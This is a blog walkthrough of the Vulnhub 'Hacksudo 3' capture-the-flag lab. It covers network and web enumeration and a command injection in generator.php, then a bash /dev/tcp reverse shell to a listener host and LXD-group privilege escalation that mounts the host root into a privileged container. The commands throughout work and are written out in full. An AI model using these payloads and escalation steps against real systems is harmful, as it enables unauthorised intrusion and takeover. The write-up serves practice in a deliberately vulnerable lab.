NepCodeX

Byte Musings: Where Tech Meets Curiosity


Hacksudo 3 Walkthrough – Vulnhub – Writeup

walkthrough hacksudo 3 writeup vulnhub

In this post, I am going to do the third machine of Hacksudo series from Vulnhub. Hacksudo is one of the best series that I have done from Vulnhub. So, I will be explaining all the steps in this walkthrough. “Hacksudo 3 Walkthrough – Vulnhub – Writeup”

Link to the machine: https://www.vulnhub.com/entry/hacksudo-3,671/

Walkthrough of Hacksudo Proxima Centauri

Identify the target

As usual, I began the challenge with the discovery of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24
69ed8d1519864a75a5c79970e1cc4fde

Scan open ports

Next, I scanned the open ports on the target to see the exposed services.

sudo nmap -v -T4 -p- -A --min-rate=1000 -oN nmap.log 10.0.2.44
b509494747cd44e694b14381658281cd

We only have http port open.

Enumerate web server

The default page of the server showed me some hints but they were of no use.

walkthrough hacksudo 3 writeup vulnhub

Firstly, I did the directory enumeration in the server.

gobuster dir -u http://10.0.2.44/ -x txt,php,html --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o dir.log
d81aabcab29c4aa4a90d5693aa3d8a97

There are many paths on the server. However, most of them looked like the personal projects of the author. But, the path generator.php was an interesting one.

1ac83b4942a34452b0fbf2b865be72e4

The reference to “smartness” has come twice in the page. When I looked at the “info.php”, I had found that earlier.

77ceeac417ef41a8b109dfaab082c8b9

Going on, the generator page would convert text to a different beautiful form. However, the app suffered command injection.

`id`
543f78e6be924eeab7fb5984e64f0f0e

And, there is another payload that would give me a different output.

&& id
00fe34c8b9b24444ac364ad843a43270

As we can see above, I got the user “www-data” as the result. Hence, I could inject some shell commands through the application. Therefore, I decided to spawn a reverse shell.

So, I listened on the port 4444.

nc -nlvp 4444

Then, I used the following payload to spawn a reverse shell.

`bash -c "bash -i >& /dev/tcp/10.0.2.15/4444 0>&1"`

Finally, I got the shell.

873e3155acdf4c549d992d594c7d5dd5

Then, I spawned a pty shell using python.

python3 -c 'import pty; pty.spawn("/bin/bash")'

# Ctrl+z
stty raw -echo;fg
reset

Get user shell

Since I got the foothold, I tried looking inside different directories. Some common directories that I always look are /, /var/www, /var/www/html, /opt, /etc/, etc. Fortunately, there was a file “hacksudo” which had some obscure content.

cd /var/www
ls -al
cat hacksudo
d394b3429f28416ba0f5c42465ff7012

We can see that there are words which are jumbled. Hence, this cannot be a hash. Also, since it has words, the first thing that came into my mind was caesar cipher. Hence, I opened the cyber chef and used the module “rot13” in the recipe.

https://gchq.github.io/CyberChef/

4f8d4a91d7f14ca0834ad90b6af6a573

It looked like the text was rotated 13 characters forward. Anyway, we got the username and what looks like a SHA512 hash. Therefore, I visited crackstation to crack the hash.

https://crackstation.net/

9f27faa9f8a24f5cb748b25a5c011fc7

The cracking was successful and we got the password for the user hacksudo. Thus, I logged in and captured the user flag.

su hacksudo
id
cd
cat user.txt
5b2b40316c144419aafa82c22fdcd19b

Root privilege escalation

Now the next thing would be the root privilege escalation. When I get the user flag, I generally look for sudo permissions, suid binaries, groups that the user belongs to, unusual files, cron jobs, etc. Thus, you can see from the previous screenshot that the user belongs to group lxd. Since I have already done exploits regarding this, I directly moved on to check if the binaries lxd and lxc are present on the machine.

Reference: https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

which lxd
which lxc

Both of the binaries were present. Hence, I proceeded with the exploit. Since the machine didn’t have access to the internet, I used the offline method.

On my local machine, I downloaded the images and created the container. Next, I served the directory using Python’s simple http server.

# Install dependencies
sudo apt update
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools

# Clone repo
go get -d -v github.com/lxc/distrobuilder 

# Make distrobuilder
cd $HOME/go/src/github.com/lxc/distrobuilder
make 

# Prepare the creation of alpine       
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/      
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml

# Create the container
sudo /home/kali/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8

# Serve the directory
python3 -m http.server
4521830e6b7f40b0aadb720bf8ac098d

On the target machine, I downloaded the images and mounted the containers there.

# Get the images
wget http://10.0.2.15:8000/lxd.tar.xz
wget http://10.0.2.15:8000/rootfs.squashfs

# Import images
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list # You can see your new imported image

# Initialze the container
lxc init alpine privesc -c security.privileged=true
d84cb6c7866f48edaf43697e3e1056d3

I got the error as there weren’t any storage pool. So, I had to initialize one with default values.

lxd init
be091f3192e4416c84641955f7519da5

Then, I re-entered the previous command and started the container.

lxc init alpine privesc -c security.privileged=true
lxc list # List containers

# Mount the root '/' of host to /mnt/root of the container
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

# Start the container and spawn a shell in it
lxc start privesc
lxc exec privesc /bin/sh
e02d4928254242ab804dee0aefec7f98

As you can see above, the root path ‘/’ is mounted at ‘/mnt/root/’ of the container. Hence, I could view the entire file system of the host machine. Finally, I captured the flag.

The walkthrough of wireless from vulnhub that contains the same exploit: Wireless Walkthrough – Vulnhub – Writeup



0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments